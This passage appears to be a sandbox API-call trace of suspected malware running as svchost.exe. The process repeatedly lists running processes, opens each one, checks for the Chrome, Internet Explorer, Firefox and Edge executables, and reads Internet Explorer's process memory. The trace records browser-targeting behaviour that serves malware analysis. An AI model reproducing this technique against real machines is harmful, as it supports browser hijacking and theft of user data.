	[0201.988] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.989] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0201.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.989] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.989] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0201.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2124
	[0201.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.990] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0201.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.991] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.991] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0201.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.991] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.992] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0201.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2128
	[0201.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.992] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0201.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.993] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.994] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0201.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.994] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.994] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0201.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x212c
	[0201.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.995] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0201.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.995] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.996] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0201.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.996] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.996] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0201.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2130
	[0201.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.997] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0201.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.997] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.998] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0201.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.998] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.999] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0201.999] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2134
	[0201.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.999] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0202.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.000] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.000] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0202.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.001] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.001] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0202.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2138
	[0202.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.002] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0202.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.002] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.003] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0202.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.003] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.003] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0202.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x213c
	[0202.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.004] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0202.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.004] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.004] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0202.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.004] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.005] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0202.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2140
	[0202.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.006] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0202.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.006] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.006] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0202.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.007] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.007] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0202.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2144
	[0202.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.008] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0202.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.009] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.009] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0202.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.010] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.010] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0202.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2148
	[0202.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.011] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0202.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.011] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.012] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0202.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.012] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.013] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0202.013] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x214c
	[0202.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.014] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0202.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.014] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.015] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0202.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.015] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.016] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0202.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2150
	[0202.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.017] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0202.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.017] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.018] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0202.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.018] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.019] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2154
	[0202.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.019] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.020] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.020] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.020] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.024] NtQueryInformationProcess (in: ProcessHandle=0x2154, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.024] ReadProcessMemory (in: hProcess=0x2154, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.024] ReadProcessMemory (in: hProcess=0x2154, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.024] ReadProcessMemory (in: hProcess=0x2154, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.024] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.024] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2158
	[0202.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.025] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.025] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.025] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.026] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.026] NtQueryInformationProcess (in: ProcessHandle=0x2158, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.026] ReadProcessMemory (in: hProcess=0x2158, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.026] ReadProcessMemory (in: hProcess=0x2158, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.026] ReadProcessMemory (in: hProcess=0x2158, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.026] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.026] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x215c
	[0202.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.027] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.027] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.028] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.028] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.028] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0202.029] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2160
	[0202.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.029] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0202.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.030] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.030] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0202.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.030] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.030] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2164
	[0202.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.031] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.032] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.032] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.032] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.032] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.033] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0202.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x2168
	[0202.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.034] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.035] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.035] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.036] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.036] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x216c
	[0202.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.037] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.037] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.037] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.038] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.038] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0202.039] CloseHandle (hObject=0x188) returned 1
	[0202.039] Sleep (dwMilliseconds=0x64) 
	[0202.146] GetCurrentProcessId () returned 0x110
	[0202.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0202.151] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0202.152] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0202.153] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0202.153] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2170
	[0202.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.154] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.154] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.154] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.155] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.155] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0202.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2174
	[0202.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.156] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.157] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.157] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.157] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
